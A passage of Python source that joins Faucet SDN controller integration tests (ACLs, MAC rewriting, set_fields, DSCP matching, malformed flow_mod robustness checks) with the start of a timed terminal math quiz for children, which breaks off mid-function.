second_host_routed_ip = ipaddress.ip_interface('fc00::20:1/112')
for _coldstart in range(2):
for _swaps in range(5):
self.verify_ipv6_routing_pair(
first_host, first_host_ip, first_host_routed_ip,
second_host, second_host_ip, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
class FaucetGroupTableTest(FaucetUntaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_BOILER_UNTAGGED
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetTaggedGroupTableTest(FaucetTaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_TAGGED_BOILER
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetEthSrcMaskTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_src: 0e:0d:00:00:00:00/ff:ff:00:00:00:00
actions:
allow: 1
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:0d:00:00:00:99')
self.retry_net_ping(hosts=(first_host, second_host))
self.wait_nonzero_packet_count_flow(
{'dl_src': '0e:0d:00:00:00:00/ff:ff:00:00:00:00'},
table_id=self._PORT_ACL_TABLE)
class FaucetDestRewriteTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2.mac should appear in third host, and not second host, as
# the acl should rewrite the dst mac.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetDestRewriteOrderedTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2.mac should appear in third host, and not second host, as
# the acl should rewrite the dst mac.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetOrderedSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
- set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
- set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and proceeds through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
class FaucetOrderedDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and proceeds through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 1
use_idle_timeout: True
""" + CONFIG_BOILER_UNTAGGED
def wait_for_host_removed(self, host, in_port, timeout=5):
for _ in range(timeout):
if not self.host_learned(host, in_port=in_port, timeout=1):
return
self.fail('host %s still learned' % host)
def wait_for_flowremoved_msg(self, src_mac=None, dst_mac=None, timeout=30):
pattern = "OFPFlowRemoved"
mac = None
if src_mac:
pattern = "OFPFlowRemoved(.*)'eth_src': '%s'" % src_mac
mac = src_mac
if dst_mac:
pattern = "OFPFlowRemoved(.*)'eth_dst': '%s'" % dst_mac
mac = dst_mac
for _ in range(timeout):
for _, debug_log_name in self._get_ofchannel_logs():
with open(debug_log_name) as debug_log:
debug = debug_log.read()
if re.search(pattern, debug):
return
time.sleep(1)
self.fail('Not received OFPFlowRemoved for host %s' % mac)
def wait_for_host_log_msg(self, host_mac, msg):
host_log_re = r'.*%s %s.*' % (msg, host_mac)
self.wait_until_matching_lines_from_faucet_log_files(host_log_re)
def test_untagged(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[:2]
self.swap_host_macs(first_host, second_host)
for host, port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.require_host_learned(host, in_port=int(port))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutRuleExpiredTest(FaucetWithUseIdleTimeoutTest):
def test_untagged(self):
"""Host that is actively sending should have its dst rule renewed as the
rule expires. Host that is not sending expires as usual.
"""
self.ping_all_when_learned()
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()
self.host_ipv4_alias(first_host, ipaddress.ip_interface('10.99.99.1/24'))
first_host.cmd('arp -s %s %s' % (second_host.IP(), second_host.MAC()))
first_host.cmd('timeout 120s ping -I 10.99.99.1 %s &' % second_host.IP())
for host in (second_host, third_host, fourth_host):
self.host_drop_all_ips(host)
self.wait_for_host_log_msg(first_host.MAC(), 'refreshing host')
self.assertTrue(self.host_learned(
first_host, in_port=int(self.port_map['port_1'])))
for host, port in (
(second_host, self.port_map['port_2']),
(third_host, self.port_map['port_3']),
(fourth_host, self.port_map['port_4'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.wait_for_host_log_msg(host.MAC(), 'expiring host')
self.wait_for_host_removed(host, in_port=int(port))
class FaucetDisconnectTest(FaucetUntaggedTest):
"""Test that switch works properly after repeated disconnections
caused by DPID mismatch"""
def update_config(self, dpid):
"""Update config with good/bad DPID"""
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['dp_id'] = int(dpid)
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_untagged(self):
"""Run untagged test after disconnects and config update"""
# We update the config with a bad DPID and then wait for
# 'unknown datapath' messages, indicating switch connections that
# FAUCET has rejected. The switch should see them as
# 'connection reset by peer'.
mask = int(16 * 'f', 16)
bad_dpid = (int(self.dpid) + 0xdeadbeef) & mask
self.update_config(dpid=bad_dpid)
self.wait_until_matching_lines_from_faucet_log_files(
r'.*ERROR.*unknown datapath', timeout=60, count=4)
self.update_config(dpid=self.dpid)
super().test_untagged()
class FaucetBadFlowModTest(FaucetUntaggedTest):
"""Test that switch and FAUCET still work after we send some bad flow_mods"""
def base_flow_mod(self):
"""Return a base flow mod that we mess with"""
return {'dpid': self.dpid,
'cookie': 0,
'cookie_mask': 0,
'table_id': 0,
'idle_timeout': 29,
'hard_timeout': 91,
'flags': 1,
'priority': 1,
'match': {'in_port': 1},
'actions': [{
'type': 'OUTPUT',
'port': 2}]}
# For now, the flow_mods are reasonably well-formed but with
# parameters that are incorrect for the switch and for FAUCET
def bad_dpid(self):
"""Return a random, bad dpid parameter"""
mask = int(16 * 'f', 16)
dpid = (int(self.dpid) + random.randint(0, 1 << 63)) & mask
return {'dpid': dpid}
@staticmethod
def bad_table():
"""Return a bad table ID parameter"""
# This should be higher than FAUCET's max table ID
bad_table_start = 32
return {'table_id': random.randint(bad_table_start, 100)}
def bad_port(self):
"""Return a (hopefully very) bad port number"""
max_port = max(self.port_map.values())
offset = random.randint(0x1000, 0xE0000000)
mask = 0xEFFFFFFF
return (max_port + offset) & mask
def bad_match(self):
"""Return a bad match field"""
matches = (
# Bad input port
{'in_port': self.bad_port()},
# IPv4 (broadcast) src with bad ('reserved') ethertype
{'nw_src': '255.255.255.255', 'dl_type': 0xFFFF},
# IPv4 with IPv6 ethertype:
{'nw_src': '1.2.3.4', 'dl_type': 0x86DD},
# IPv4 address as IPv6 dst
{'ipv6_dst': '1.2.3.4', 'dl_type': 0x86DD},
# IPv6 dst with Bad/reserved ip_proto
{'ipv6_dst': '2001::aaaa:bbbb:cccc:1111', 'ip_proto': 255},
# Destination port but no transport protocol
{'tp_dst': 80},
# ARP opcode on non-ARP packetx
{'arp_op': 0x3, 'dl_type': 0x1234})
match = random.sample(matches, 1)[0]
return {'match': match}
def bad_actions(self, count=1):
"""Return a questionable actions parameter"""
actions = (
{'type': 'OUTPUT', 'port': self.bad_port()},
{'type': 'PUSH_MPLS', 'ethertype': 0x8BAD},
{'type': 'SET_QUEUE', 'queue_id':
random.randint(0x8000, 0xFFFFFFFF)})
return {'actions': random.sample(actions, count)}
# Possible options for bad parameters
bad_options = ('dpid', 'table', 'match', 'actions')
def bad_flow_mod(self):
"""Return a flow mod with some bad parameters"""
flow_mod = self.base_flow_mod()
# Add two or more bad options
options = random.sample(self.bad_options,
random.randint(2, len(self.bad_options)))
for option in options:
param = getattr(self, 'bad_%s' % option)()
flow_mod.update(param)
return flow_mod
def send_flow_mod(self, flow_mod, timeout=5):
"""Send flow_mod to switch via ofctl"""
int_dpid = mininet_test_util.str_int_dpid(self.dpid)
return self._ofctl_post(int_dpid, 'stats/flowentry/modify',
timeout=timeout, params=flow_mod)
def tearDown(self, ignore_oferrors=True):
"""Ignore OF errors on teardown"""
oferrors = super().tearDown(ignore_oferrors)
oferrors = re.findall(r'type: (\w+)', oferrors)
counter = collections.Counter(oferrors)
error('Ignored OF error count: %s\n' % dict(counter))
# TODO: ensure at least one error is always generated.
# pylint: disable=arguments-differ
def test_untagged(self, count=10):
"""Send a bunch of bad flow mods, then verify connectivity"""
for _ in range(count):
flow_mod = self.bad_flow_mod()
error('sending bad flow_mod', flow_mod, '\n')
self.send_flow_mod(flow_mod)
self.ping_all_when_learned()
class FaucetUntaggedMorePortsBase(FaucetUntaggedTest):
"""Base class for untagged test with more ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 16 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 180 # Timeout for event logger process
# Config lines for additional ports
CONFIG_EXTRA_PORT = """
{port}:
native_vlan: 100""" + "\n"
def pre_start_net(self):
"""Extend config with more ports if needed"""
self.assertTrue(self.CONFIG.endswith(CONFIG_BOILER_UNTAGGED))
# We know how to extend the config for more ports
base_port_count = len(re.findall('port', CONFIG_BOILER_UNTAGGED))
ports = self.topo.dpid_ports(self.dpid)
for port in ports[base_port_count:]:
self.CONFIG += self.CONFIG_EXTRA_PORT.format(port=port)
super()._init_faucet_config()
def setUp(self):
"""Make sure N_UNTAGGED doesn't exceed hw port count"""
if self.config and self.config.get('hw_switch', False):
self.N_UNTAGGED = min(len(self.config['dp_ports']),
self.N_UNTAGGED)
error('(%d ports) ' % self.N_UNTAGGED)
super().setUp()
class FaucetSingleUntagged32PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 32 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 32 # Maximum number of ports to test
@unittest.skip('slow and potentially unreliable on travis')
class FaucetSingleUntagged48PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 48 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 48 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 360 # Timeout for event logger process
|
timed_quiz.py
|
#!/usr/bin/python3
# imports {{{
import logging
import threading
import time
import datetime
import sys
import tty, termios
import random
import argparse
import atexit
# }}}
################## Global stuff ################## {{{
x0 = 0
y0 = 0
sec = 0
sec_inc = 1
lock=threading.Lock()
# Set up unbuffered read from stdin
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
flog = open('history.txt','a')
# Set up logger output
logger = logging.getLogger()
fdbg=logging.FileHandler('debug.log')
fdbg.setLevel(logging.DEBUG)
fdbg.setFormatter(logging.Formatter("%(asctime)s: %(message)s",'%H:%M:%S'))
logger.addHandler(fdbg)
#}}}
################## Functions ################## {{{
def myclrline(y,x): #{{{
with lock:
sys.stdout.write ("\x1b[s\x1b[?25l")
sys.stdout.flush ()
sys.stdout.write ("\x1b["+str(y+y0)+";"+str(x+x0)+"H\x1b[K\x1b[u\x1b[?25h")
sys.stdout.flush ()
#}}}
def myaddstr(y,x,buf): #{{{
with lock:
sys.stdout.write ("\x1b[s\x1b[?25l")
sys.stdout.flush ()
sys.stdout.write ("\x1b["+str(y+y0)+";"+str(x+x0)+"H"+buf+"\x1b[u\x1b[?25h")
sys.stdout.flush ()
#}}}
def myaddstr_m(yxbuf): #{{{
with lock:
for i in yxbuf:
sys.stdout.write ("\x1b[s\x1b[?25l")
sys.stdout.flush ()
sys.stdout.write ("\x1b["+str(i[0]+y0)+";"+str(i[1]+x0)+"H"+i[2]+"\x1b[u\x1b[?25h")
sys.stdout.flush ()
#}}}
def timer_function(name): #{{{
global sec
global lock
logging.debug ("Thread %s: starting", name)
while sec<quiz_timeout:
time.sleep(1)
logging.debug (sec)
sec = sec + sec_inc
towrite = [(1-y0, 1-x0, "\x1b[2m"+str(sec)+"\x1b[m")];
if sec % 5 == 1:
towrite.append ((10,10,str(int((c_right+c_wrong)*60./sec))+" "));
myaddstr_m (towrite)
myaddstr (1-y0, 1-x0, "\x1b[2m"+str(sec)+"\x1b[m TIMEOUT!")
logging.debug ("Thread %s: finishing", name)
#}}}
def cleanup(): #{{{
sys.stdout.write("\x1bc\x1b[?25h\x1b[f\x1b[J") # clear screen
sys.stdout.flush ()
termios.tcsetattr (fd, termios.TCSADRAIN, old_settings)
logging.debug ("Main : all done")
flog.close ()
#}}}
def _get_termsize(): #{{{
import struct
import fcntl
cr = struct.unpack('hh',fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr # (rows,columns)
#}}}
#}}}
################## Main program ##################
parser = argparse.ArgumentParser(description="Fun math quiz for kids!")
parser.add_argument('-T','--timeout', type=int, default=10, help='timeout in seconds (default=10)')
parser.add_argument('-t','--type', type=str, default=1, help='quiz type (1:add,2:sub,3:add+sub,default=1)')
parser.add_argument('-r1', '--x1range', type=str, default='0,10', help='x1 range')
parser.add_argument('-r2', '--x2range', type=str, default='0,10', help='x2 range')
parser.add_argument('--log', choices=['INFO','info','DEBUG','debug'], default='INFO', help='log level (default=INFO)')
try:
options = parser.parse_args(sys.argv[1:])
except:
print("Error parsing arguments!");
sys.exit()
numeric_level = getattr(logging, options.log.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
logger.setLevel(numeric_level)
quiz_timeout = options.timeout
lower1,upper1 = options.x1range.split(',')
lower2,upper2 = options.x2range.split(',')
lower1 = int(lower1)
upper1 = int(upper1)
lower2 = int(lower2)
upper2 = int(upper2)
list_q_type = [int(i) for i in options.type.split(',')]
num_q_type = len(list_q_type)
print(num_q_type,list_q_type)
# 1: add
# 2: sub
# 3: add/sub
# 4: add/sub with r1 for result range, (r1 -+ r2) +- r2 = ?
# 5: r1 = r2 +- ?
# Proper TTY reset at exit
atexit.register (cleanup)
# TTY fullscreen and unbuffered input
tty.setraw (sys.stdin.fileno())
sys.stdout.write ("\x1b[f\x1b[J") # clear screen
sys.stdout.flush ()
(nrow,ncol) = _get_termsize ()
#flog.write(str(nrow/2-5)+" "+str(ncol))
x0 = max(int(ncol/2-8),0)
y0 = max(int(nrow/2-5),0)
# main quiz codes
flog.write("\n======== "+str(datetime.datetime.now())+" ========\n\n")
s = ""
sec = 0
c_right = 0
c_wrong = 0
signchar = ('-','+')
myaddstr_m ((( 1-y0,1-x0,"\x1b[2m0\x1b[m"),\
( 8,1,"Correct: 0"),\
( 9,1," Wrong: 0"),\
(10,1," APM: 0")))
timer_thread = threading.Thread(target=timer_function, args=(1,), daemon=True)
timer_thread.start()
p_m = 0
# Main loop over questions {{{
while sec < quiz_timeout:
inplen = 0
inpstr = [' ' for i in range(10)]
# question generation {{{
if num_q_type > 1:
q_type = list_q_type[random.randint(0,num_q_type-1)]
else:
q_type = list_q_type[0]
if q_type == 5 or q_type == 6:
x1 = random.randint(lower1,upper1)
x2 = random.randint(lower2,upper2)
if q_type == 6:
p_m = random.randint(0,1)
else:
p_m = 1
if p_m == 0:
result = x2
x2 = x1 + x2
else:
result = x1
x1 = x1 + x2
qstr0 = str(x1)+" = "+str(x2)+" "+signchar[p_m]+" "
qstr = "\x1b["+str(3+y0)+";"+str(3+x0)+"H"+ qstr0 + "\x1b[K\x1b[?25h"
elif q_type == 4:
